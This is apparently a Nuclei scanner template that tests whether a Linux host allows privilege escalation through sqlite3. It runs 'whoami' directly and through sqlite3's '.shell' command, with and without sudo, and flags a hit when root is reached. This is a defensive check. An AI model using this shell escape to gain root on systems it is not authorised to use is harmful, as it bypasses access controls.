id: privesc-sqlite3

info:
  name: sqlite3 - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    sqlite3 is a lightweight, self-contained, and serverless SQL database engine. It is widely used in embedded systems, mobile devices, and small to medium-sized applications.
  reference:
    - https://gtfobins.github.io/gtfobins/sqlite3/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,sqlite3,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      sqlite3 /dev/null '.shell whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo sqlite3 /dev/null '.shell whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 4a0a00473045022022a00ad1518880dc881748fd331a8f7a3c599927934d342c7221c5ecccd445c1022100cff484fd929a67261efcef2917d8976308c8062ca11652d78b36b40c195c08aa:922c64590222798bb761d5b6d8e72950